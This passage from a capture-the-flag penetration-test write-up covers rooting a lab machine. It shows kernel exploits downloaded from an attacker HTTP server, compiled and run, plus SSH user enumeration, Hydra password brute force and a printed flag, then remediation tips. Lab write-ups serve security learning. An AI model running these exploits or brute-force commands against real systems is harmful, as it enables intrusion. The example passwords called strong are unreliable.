   262218     64 -rwsr-xr-x   1 root     root          64424 Mar  9  2017 /bin/ping
   278115     32 -rwsr-xr-x   1 root     root          30800 Aug 11  2016 /bin/fusermount
   262255     32 -rwsr-xr-x   1 root     root          30792 Nov 16  2016 /bin/umount
   277305    144 -rwsr-xr-x   1 root     root         146128 Feb  1  2017 /bin/ntfs-3g
   262205     40 -rwsr-xr-x   1 root     root          38984 Nov 16  2016 /bin/mount
   262236     40 -rwsr-xr-x   1 root     root          40128 Sep 20  2016 /bin/su

I searched for each one on GTFOBins, but nothing useful was found.

Sudo

Lets check which commands can be run with sudo without password:

www-data@gamma:/$ sudo -l
[sudo] password for www-data:

We dont have the password of www-data, so this doesnt work.

Capabilities

www-data@gamma:/$ getcap -r / 2>/dev/null
/usr/bin/mtr = cap_net_raw+ep
www-data@gamma:/$

Lets go to GTFOBins and check if this is found.

There is only "File read" and "Sudo".

So, this didn't work also.

Cronjobs

cat /etc/crontab

Results:

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Lets check the cron.hourly:

www-data@gamma:/etc/cron.daily$ ls -la
total 64
drwxr-xr-x   2 root root 4096 Sep 16  2020 .
drwxr-xr-x 100 root root 4096 Nov 25 21:18 ..
-rw-r--r--   1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root  539 Jul 16  2019 apache2
-rwxr-xr-x   1 root root  376 Dec 14  2016 apport
-rwxr-xr-x   1 root root 1474 Apr  1  2017 apt-compat
-rwxr-xr-x   1 root root  355 Oct 25  2016 bsdmainutils
-rwxr-xr-x   1 root root 1597 Apr 25  2016 dpkg
-rwxr-xr-x   1 root root  372 Mar 22  2017 logrotate
-rwxr-xr-x   1 root root 1065 Dec 13  2016 man-db
-rwxr-xr-x   1 root root  539 Jul 26  2016 mdadm
-rwxr-xr-x   1 root root  435 Nov 18  2014 mlocate
-rwxr-xr-x   1 root root  249 Nov 19  2014 passwd
-rwxr-xr-x   1 root root 3449 Feb 26  2016 popularity-contest
-rwxr-xr-x   1 root root  441 Jan 28  2017 sysstat
-rwxr-xr-x   1 root root  214 Jul 12  2013 update-notifier-common

We can't edit any of those.

Lets move to another method.

Kernel

We found previously by the command uname -r, that the kernel version is 4.10.0-19-generic.

Lets search on searchsploit for vulnerabilities associated with this version.

searchsploit Linux Kernel 4.10

Results:

-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation                                                             | solaris/local/15962.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) | linux/local/9479.c
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation                                                                     | linux/local/50135.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation                                  | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow)             | linux/local/37293.txt
Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation                                                       | linux/local/47163.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                                                                  | linux/dos/43234.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                                                                            | linux/local/41886.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service                                                          | linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation                                                                          | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation                                                     | linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC)                                                                               | linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                                         | linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service                                                                                     | linux/dos/42932.c
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak                                                                              | linux/local/44325.c
Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption                                                                  | linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free                                                                                        | linux/dos/44579.c
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Lets try this one:

Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                                         | linux/local/45010.c

Lets copy it first to our current directory:

┌──(kali㉿kali)-[~/tryhackme]
└─$ searchsploit -m 45010.c
  Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/45010
     Path: /usr/share/exploitdb/exploits/linux/local/45010.c
    Codes: CVE-2017-16995
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/tryhackme/45010.c

Now, lets move the exploit to the target machine:

On our attacker machine, lets start an http server:

python3 -m http.server 8080

On the netcat session:

www-data@gamma:/tmp$ wget http://192.168.229.150:8080/45010.c
--2024-12-06 00:56:01--  http://192.168.229.150:8080/45010.c
Connecting to 192.168.229.150:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13176 (13K) [text/x-csrc]
Saving to: '45010.c'

45010.c                                   100%[=====================================================================================>]  12.87K  --.-KB/s    in 0s      

2024-12-06 00:56:01 (618 MB/s) - '45010.c' saved [13176/13176]

www-data@gamma:/tmp$

Lets now compile the exploit:

gcc -o exploit 45010.c

Making it executable:

www-data@gamma:/tmp$ chmod +x exploit

Running it:

./exploit

Result:

[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8d47f7b49b00
[*] Leaking sock struct from ffff8d47fc26c800
[*] Sock->sk_rcvtimeo at offset 592
[*] Cred structure at ffff8d47fc27c540
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff8d47fc27c540
[*] credentials patched, launching shell...
# whoami
root
#

And we are root!

Lets now upgrade the shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Lets seach now for the flag

find / -name "flag" 2>/dev/null

Result:

/var/www/html/images/flag.txt
/root/flag.txt
root@gamma:/#

cat /root/flag.txt

Result:

                          _____                          
                   _.+sd$$$$$$$$$bs+._                   
               .+d$$$$$$$$$$$$$$$$$$$$$b+.               
            .sd$$$$$$$P^*^T$$$P^*"*^T$$$$$bs.            
          .s$$$$$$$$P*     `*' _._  `T$$$$$$$s.          
        .s$$$$$$$$$P          ` :$;   T$$$$$$$$s.        
       s$$$$$$$$$$;  db..+s.   `**'    T$$$$$$$$$s       
     .$$$$$$$$$$$$'  `T$P*'             T$$$$$$$$$$.     
    .$$$$$$$$$$$$P                       T$$$$$$$$$$.    
   .$$$$$$$$$$$$$b                       `$$$$$$$$$$$.   
  :$$$$$$$$$$$$$$$.                       T$$$$$$$$$$$;  
  $$$$$$$$$P^*' :$$b.                     d$$$$$$$$$$$$  
 :$$$$$$$P'      T$$$$bs._               :P'`*^T$$$$$$$; 
 $$$$$$$P         `*T$$$$$b              '      `T$$$$$$ 
:$$$$$$$b            `*T$$$s                      :$$$$$;
:$$$$$$$$b.                                        $$$$$;
$$$$$$$$$$$b.                                     :$$$$$$
$$$$$$$$$$$$$bs.                                 .$$$$$$$
$$$$$$$$$$$$$$$$$bs.                           .d$$$$$$$$
:$$$$$$$$$$$$$P*"*T$$bs,._                  .sd$$$$$$$$$;
:$$$$$$$$$$$$P     TP^**T$bss++.._____..++sd$$$$$$$$$$$$;
 $$$$$$$$$$$$b           `T$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 
 :$$$$$$$$$$$$b.           `*T$$P^*"*"*^^*T$$$$$$$$$$$$; 
  $$$b       `T$b+                        :$$$$$$$BUG$$  
  :$P'         `"'               ,._.     ;$$$$$$$$$$$;  
   \                            `*TP*     d$$P*******$   
    \                                    :$$P'      /    
     \                                  :dP'       /     
      `.                               d$P       .'      
BAKRI   `.                             `'      .'        
          `-.                               .-'          
             `-.                         .-'             
                `*+-._             _.-+*'                
                      `"*-------*"'
Congradulations on obtaining the allmighty root user flag. Great work! Do not forget that you have goal 2 in the CTF requirements
The flag of root:
flag{2893d890e8847d5575ac33229a037ca4}
root@gamma:/#

So the root flag is: flag{2893d890e8847d5575ac33229a037ca4}.

4- Extra Attack Vectors

Privilege escalation

First one

Lets re-check the kernel version:

www-data@gamma:/tmp$ uname -r
4.10.0-19-generic

Now, Lets search on searchsploit for any other exploits:

searchsploit linux 4.10

Results:

 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation                                                               | linux/local/37088.c
CyberArk < 10 - Memory Disclosure                                                                                                     | linux/remote/44829.py
CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure                                                                              | linux/dos/44428.txt
Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution                                                                          | linux/local/44920.txt
Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution                                                                          | linux/local/44920.txt
Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution                                                                         | linux/remote/44921.txt
Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution                                                                         | linux/remote/44921.txt
Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read                                                                       | linux/local/44688.txt
DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit)                                                                              | linux/webapps/42769.rb
Exim < 4.86.2 - Local Privilege Escalation                                                                                            | linux/local/39549.txt
Exim < 4.90.1 - 'base64d' Remote Code Execution                                                                                       | linux/remote/44571.py
Exim Internet Mailer 3.35/3.36/4.10 - Format String                                                                                   | linux/local/22066.c
Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit)                                                               | linux/remote/16925.rb
Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access                                                                                  | linux/remote/43386.py
Jfrog Artifactory < 4.16 - Arbitrary File Upload / Remote Command Execution                                                           | linux/webapps/44543.txt
LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure                                                                  | linux/remote/44022.md
LinkLogger 2.4.10.15 - 'syslog' Denial of Service                                                                                     | linux/dos/8955.pl
Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module                                                        | linux/dos/46477.txt
Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall                                | linux/dos/44641.c
Linux < 4.20.14 - Virtual Address 0 is Mappable via Privileged write() to /proc/*/mem                                                 | linux/dos/46502.txt
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation                                                             | solaris/local/15962.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) | linux/local/9479.c
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation                                                                     | linux/local/50135.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation                                  | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow)             | linux/local/37293.txt
Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation                                                       | linux/local/47163.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                                                                  | linux/dos/43234.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                                                                            | linux/local/41886.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service                                                          | linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation                                                                          | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation                                                     | linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC)                                                                               | linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                                         | linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service                                                                                     | linux/dos/42932.c
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak                                                                              | linux/local/44325.c
Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption                                                                  | linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free                                                                                        | linux/dos/44579.c
Logpoint < 5.6.4 - Root Remote Code Execution                                                                                         | linux/remote/42158.py
MiniDVBLinux <=5.4  - Config Download Exploit                                                                                         | hardware/remote/51091.txt
NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Local Privilege Escalation                                                                 | linux/local/42305.txt
OpenSSH 2.3 < 7.7 - Username Enumeration                                                                                              | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                                                                                        | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Execution                                                                                          | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution                                                                                                | linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation                                  | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading                                                                              | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                                                                                                  | linux/remote/45939.py
Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service                                                                            | linux/dos/34522.txt
Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service                                                                | linux/dos/34521.txt
Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation                                                                 | linux/local/41196.txt
Oracle WebCenter FatWire Content Server < 7 - Improper Access Control                                                                 | linux/webapps/44757.txt
Redis-cli < 5.0 - Buffer Overflow (PoC)                                                                                               | linux/local/44904.py
RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution                                                                     | linux/webapps/45361.py
runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1)                                                                            | linux/local/46359.md
runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)                                                                            | linux/local/46369.md
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)                                                                           | linux/local/47009.c
SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)                                                             | linux/webapps/41697.rb
Splunk < 7.0.1 - Information Disclosure                                                                                               | linux/webapps/44865.txt
systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation                                              | linux/local/43935.txt
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation                                                | linux/local/41760.txt
UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Root Remote Code Execution                                                         | linux/remote/42949.txt
UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation                                                                        | linux/local/42936.md
UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape                                                                           | linux/local/42937.md
UoW Pine 4.0.4/4.10/4.21 - 'From:' Remote Buffer Overflow                                                                             | linux/remote/20237.c
usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Local Privilege Escalation                                                             | linux/local/36820.txt
VFU 4.10-1.1 - Local Buffer Overflow                                                                                                  | linux/local/35450.txt
VFU 4.10-1.1 - Move Entry Buffer Overflow                                                                                             | linux/local/36229.py
Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution                                                                            | linux/local/46973.md
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There is one that caught my attention:

Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation                                                                     | linux/local/50135.c

Our kernel version is in this range. Lets try it out.

┌──(kali㉿kali)-[~/tryhackme]
└─$ searchsploit -m 50135  
  Exploit: Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/50135
     Path: /usr/share/exploitdb/exploits/linux/local/50135.c
    Codes: CVE-2021-22555
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/tryhackme/50135.c

First, lets check the exploit to see if there are any needed modifications before we run the exploit on the vulnerable machine.

nano 50135.c

There is this line: gcc -m32 -static -o exploit exploit.c

So, we need this compiler. I asked Chat GPT for the compiler:

ChatGPT output:

sudo apt install gcc-multilib libc6-dev-i386 -y

So, I did this command, and compiled the exploit:

gcc -m32 -static -o exploit 50135.c

Now, lets move this exploit to the vulnerable machine:

On our attacker machine, lets start an http server on port 8080:

python3 -m http.server 8080

On the nc session, lets run:

wget 192.168.229.150:8080/exploit

Result:

--2024-12-06 00:10:54--  http://192.168.229.150:8080/exploit
Connecting to 192.168.229.150:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 777336 (759K) [application/octet-stream]
Saving to: 'exploit'

exploit                                   100%[=====================================================================================>] 759.12K  --.-KB/s    in 0.005s  

2024-12-06 00:10:54 (163 MB/s) - 'exploit' saved [777336/777336]

chmod +x exploit

www-data@gamma:/tmp$ ./exploit
[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[-] Error could not corrupt any primary message.
www-data@gamma:/tmp$ uname -r
4.10.0-19-generic

It didn't work.

Second One:

Our ubuntu version is 17.04

Lets try another exploit from exploit db.

In exploit-db website, lets type ubuntu 17.04

This is the exploit, lets check out the code before we try it.

Lets now transfer it to the vulnerable machine.

On the attacker machine, lets open an http server:

python3 -m http.server 8080

On the Target machine, lets go to the /tmp directory.

cd /tmp

www-data@gamma:/tmp$ wget http://192.168.229.150:8080/exploit.c
wget http://192.168.229.150:8080/exploit.c
--2024-12-09 11:27:18--  http://192.168.229.150:8080/exploit.c
Connecting to 192.168.229.150:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30153 (29K) [text/x-csrc]
Saving to: 'exploit.c'

exploit.c           100%[===================>]  29.45K  --.-KB/s    in 0s      

2024-12-09 11:27:18 (128 MB/s) - 'exploit.c' saved [30153/30153]

www-data@gamma:/tmp$ wget http://192.168.229.150:8080/la.c     
wget http://192.168.229.150:8080/la.c
--2024-12-09 11:27:35--  http://192.168.229.150:8080/la.c
Connecting to 192.168.229.150:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 761 [text/x-csrc]
Saving to: 'la.c'

la.c                100%[===================>]     761  --.-KB/s    in 0s      

2024-12-09 11:27:35 (204 MB/s) - 'la.c' saved [761/761]

www-data@gamma:/tmp$ ls
ls
exploit.c  la.c
www-data@gamma:/tmp$ gcc exploit.c -o exploit -fno-stack-protector -z execstack -no-pie
<o exploit -fno-stack-protector -z execstack -no-pie
exploit.c: In function 'main':
exploit.c:882:18: fatal error: la.so.h: No such file or directory
         #include "la.so.h"
                  ^~~~~~~~~
compilation terminated.
www-data@gamma:/tmp$ gcc -fpic -shared -nostdlib -Os -s -o la.so la.c
gcc -fpic -shared -nostdlib -Os -s -o la.so la.c
www-data@gamma:/tmp$ xxd -i la.so > la.so.h
xxd -i la.so > la.so.h
www-data@gamma:/tmp$ gcc exploit.c -o exploit -fno-stack-protector -z execstack -no-pie
<o exploit -fno-stack-protector -z execstack -no-pie

Note: ChatGPT helped with this command:

gcc exploit.c -o exploit -fno-stack-protector -z execstack -no-pie
<o exploit -fno-stack-protector -z execstack -no-pie

Lets now run the exploit:

www-data@gamma:/tmp$ ./exploit 5 /bin/bash
./exploit 5 /bin/bash
Target 5 Ubuntu 17.04 (Zesty Zapus)
safe_stack_size 32768
origin /bin (4)
repl_max 20
num_important_hwcaps 23
max 24 ihcp 524288 ihcs 118784 len 131055 gpj 241952 gwr 61736 bwr 48527 cnt 6931 dst 8 repl 6
MIN_GAP 17314082816
copied 3 libs
try 1 5.930564 signal 13
try 2 1.049547 signal 13
try 3 0.998554 signal 13
try 4 1.016811 signal 13
try 5 0.995796 signal 13
try 6 0.963164 signal 13
try 7 0.968372 signal 13
try 8 1.004376 signal 13
try 9 1.020167 signal 13
try 10 1.002810 signal 13
try 11 1.000182 signal 13
try 12 0.977105 signal 13
try 13 1.018266 signal 13
try 14 1.001272 signal 13
try 15 0.924325 signal 13

Didn't work.

Nessus Scan

Lets Specify the IP:

Launching Scan:

Results:

1- JQuery 1.2 < 3.5.0 Multiple XSS

https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/

https://security.paloaltonetworks.com/PAN-SA-2020-0007

2- SSH Terrapin Prefix Truncation Weakness (CVE-2023-48795)

https://terrapin-attack.com/

Those were the main 2 vulnerabilities found.

Other Ports

SSH

Scan:

nmap -sV -p22 192.168.213.138

Results:

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0) MAC Address: 00:0C:29:7F:C0:F0 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Version: OpenSSH 7.4p1 (Ubuntu 10) This is an older version of OpenSSH, and it may have known vulnerabilities that could be exploited.

CVE-2018-15473

This exploit targets openSSH < 7.7 - user enumeration. Steps:

Lets Download the Exploit:

searchsploit -m 45233.py

Lets now Create a python Virtual Environment to install dependencies:

python3 -m venv ~/myvenv source 
~/myvenv/bin/activate 
pip install 
chmod +x 45233.py

Now, lets run the exploit to check if www-data and root are valid users:

python3 45233.py 192.168.213.138 --username root root is a valid user!

python3 45233.py 192.168.213.138 --username www-data www-data is a valid user!

Bruteforce SSH

Since we now know that www-data and root are valid users, we'll run a bruteforce attack on ssh:

hydra -l www-data -P /usr/share/wordlists/rockyou.txt ssh://192.168.213.138

Result:

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-07 08:50:57 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://192.168.213.138:22/ [STATUS] 394.00 tries/min, 394 tries in 00:01h, 14344007 to do in 606:47h, 14 active [STATUS] 309.00 tries/min, 927 tries in 00:03h, 14343478 to do in 773:40h, 10 active [STATUS] 270.43 tries/min, 1893 tries in 00:07h, 14342512 to do in 883:57h, 10 active [STATUS] 260.67 tries/min, 3910 tries in 00:15h, 14340495 to do in 916:55h, 10 active [STATUS] 253.68 tries/min, 7864 tries in 00:31h, 14336541 to do in 941:55h, 10 active [STATUS] 252.26 tries/min, 11856 tries in 00:47h, 14332549 to do in 946:58h, 10 active [STATUS] 250.87 tries/min, 15805 tries in 01:03h, 14328600 to do in 951:55h, 10 active
[STATUS] 250.33 tries/min, 19776 tries in 01:19h, 14324629 to do in 953:44h, 10 active

Unfortunately, it didn't work on www-data.

Now, Lets try on root.

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.213.138

Result:

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-07 10:19:13 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://192.168.213.138:22/ [STATUS] 366.00 tries/min, 366 tries in 00:01h, 14344035 to do in 653:12h, 14 active [STATUS] 365.00 tries/min, 1095 tries in 00:03h, 14343306 to do in 654:57h, 14 active [STATUS] 345.00 tries/min, 2415 tries in 00:07h, 14341986 to do in 692:51h, 14 active [STATUS] 345.40 tries/min, 5181 tries in 00:15h, 14339220 to do in 691:55h, 14 active [STATUS] 332.32 tries/min, 10302 tries in 00:31h, 14334101 to do in 718:54h, 12 active [STATUS] 319.66 tries/min, 15024 tries in 00:47h, 14329379 to do in 747:07h, 12 active

Also, didn't work.

OpenSSH < 6.6 SFTP - Command Execution

We first check the code. It needs username: password. Since we don't know them, we can't use this exploit.

CVE-2016-10009

Following the steps in the CVE:

Lets compile the code:

gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall

Lets connect to another machine using "ssh -A". Then, on the remote machine:

sh-add -s [...]/evil_lib.so

To do the above, I sent the code to the other machine using the exploited port 80 using http.server, so now the compiled evil_lib.so is on the target machine.

www-data@gamma:/tmp$ ls 45010.c 45010.c.1 evil_lib.so exploit linpeas.out linpeas.sh tmux-33

Now we run the code as specified:

www-data@gamma:/tmp$ ssh-add -s /tmp/evil_lib.so 
Could not open a connection to your authentication agent.

It didn't work.

Port 5355

Looked for exploits of port 5355 on exploit-db. None found. Searched the web for "port 5355 vulnerabilities". No exploits found. Using searchsploit:

searchsploit llmnr 
Exploits: No Results 
Shellcodes: No Results

Port 68

• Looked for exploits of port 68 on exploit-db. None found.

• This might be relevant: (source: https://www.sonicwall.com/blog/cve-2018-1111- network-manager-command-injection-vulnerability)

"SonicWall Threat Research Lab is seeing attempts to exploit the CVE-2018- 1111 vulnerability - An OS command injection flaw in the Red Hat NetworkManager integration script included in its DHCP package. This is due to improper validation of DHCP responses by the Network Manager. Red Hat NetworkManager that's shipped by default with Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to this flaw. A remote attacker could exploit this vulnerability by sending a malicious DHCP response to a vulnerable target.   The Dynamic Host Configuration Protocol (DHCP) is a network management protocol that issues DHCP requests to fetch network configurations such as IP address, Gateway, DNS servers and more. DHCP is implemented with two UDP port numbers (67 & 68). Port 67 is the destination port of a server and 68 is used by the client. A single DHCP transaction consists of several DHCP messages exchanged between the DHCP client and DHCP server. When a Network Manager receives a DHCP response with option records, DHCP client package provided by Red Hat for the NetworkManager component tries to read DHCP Option data for each of the record using the script and evaluates it to set the necessary environment variables. As the Option data is not properly sanitized, supplied arguments  such as shell commands result in arbitrary command execution. Hence an attacker with a malicious DHCP server can spoof DHCP responses to vulnerable DHCP clients to execute arbitrary shell commands with root privileges."

Further examining this CVE, it specifically targets Red Hat-based distributions and their dhclient implementation. Ubuntu 10 (or any Debian-based distribution) does not use the same vulnerable script mechanism in dhclient, so this exploit would not work directly on Ubuntu 10.

Since we have access to the machine from exploiting port 80, I checked the version of dhclient to see what are some relevant vulnerabilities:

www-data@gamma:/tmp$ dhclient --version isc-dhclient-4.3.5

Run searchsploit:

searchsploit dhclient 4.3.5
Exploits: No Results 
Shellcodes: No Results

5- Remediations and Recommendations for Machine Owner

Passwords

What Makes a Password Strong?

In today's digital age, hackers have advanced tools that can crack weak passwords in seconds. To stay secure, your password needs to be unique, complex, and not tied to your personal information.

How to Create a Secure Password

• Complexity is Key:

A strong password should have at least 16 characters, mixing uppercase and lowercase letters, numbers, and symbols. For example: MySecureP@ssw0rd2024!.

• Avoid Personal Information:

Don’t use your name, birthday, or anything linked to your identity like in the exploited machine the password is a name "HusseinBakri".

• Passphrases Work Wonders:

Use memorable yet random sentences. Instead of a random mix, try something like:

"ILoveToTravelInItaly2024!".

It's long, personal to your hobbies, and easy for you to recall but tough for hackers to guess.

Server-Side Fix to Prevent .jpg.php Uploads

1. Server-Side File Type Validation

First, ensure that the backend performs strict validation on the MIME type of the file. In your jQuery backend (if you’re using a backend written in PHP or Node.js, for example), check the MIME type to confirm the uploaded file is indeed an image and not a disguised PHP script.

Here’s a basic example using PHP to validate uploaded files:

// Get the MIME type of the uploaded file $fileMimeType = mime_content_type($_FILES['fileInput']['tmp_name']); // Only allow image MIME types $allowedMimeTypes = ['image/jpeg', 'image/png']; if (!in_array($fileMimeType, $allowedMimeTypes)) { die('Invalid file type. Only JPEG and PNG files are allowed.'); }

1. Check File Extensions and File Content

